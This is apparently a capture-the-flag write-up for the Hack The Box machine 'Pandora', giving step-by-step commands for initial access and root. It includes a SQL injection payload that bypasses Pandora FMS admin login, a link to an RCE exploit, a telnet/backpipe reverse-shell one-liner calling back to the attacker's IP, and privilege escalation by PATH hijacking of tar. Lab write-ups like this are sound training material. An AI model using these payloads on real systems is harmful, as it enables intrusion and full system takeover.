Pandora

This one was done mostly by my friend Phil, he got the foothold and user flag down, I just did the priv esc (it was pretty easy). So I'll just list out the steps to getting a foothold rather than my thought process.

Foothold

Add pandora.htb to /etc/hosts

ssh -L 8000:localhost:80 daniel@pandora.htb

password is HotelBabylon23 (thx phil)

On the host machine, go to 127.0.0.1:8000

Next is a SQL injection.
In a new tab, go to:

https://127.0.0.1:8000/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- SgGO

Refresh the 127.0.0.1:8000 tab, and you should be logged in as admin.

Next, use this python script to RCE with the admin cookie:

https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated

This part was really glitchy, so dont screw up the first run of the script, else you might have to change HTB servers.

In a new terminal tab, open a netcat listener with

nc -lvnp 4444

On the RCE terminal, paste in

mknod backpipe p; telnet $IP 4444 0<backpipe | /bin/bash 1>backpipe

and make sure to change the $IP to your local OpenVPN IP.

Now to upgrade the shell use

python3 -c 'import pty; pty.spawn("/bin/bash")'

The shell is still kinda stupid, so if you can manage to get an ssh session going with authorized_keys or id_rsa, use that

cd /home/matt
cat user.txt

Privilege Escalation

Now with a nice foothold, we gotta get the juicy root flag.

After running down all the priv esc techniques (using my checklist), I found the suid execs with

find / -type f -a ( -perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null

and found something called pandora_backup

Interesting...Thats probably our priv esc vector.

I ran pandora_backup and it said I lacked the privs to backup.

I still wanted to know what it did so I ran

ltrace pandora_backup

and it seemed it was running tar as system. Looks like this is definitely the priv esc vector.

The PATH variable is writeable so I'll just trick the system into running a fake tar file.

echo "/bin/bash" > /home/matt/tar

export PATH=/home/matt:$PATH

You can do a sanity check to make sure its calling the right tar (the one we just made) with

which tar

It should say /home/matt/tar

finally just run

pandora_backup

and huzzah! root!

cat /root/root.txt

shoutouts to phil 'filmore' mor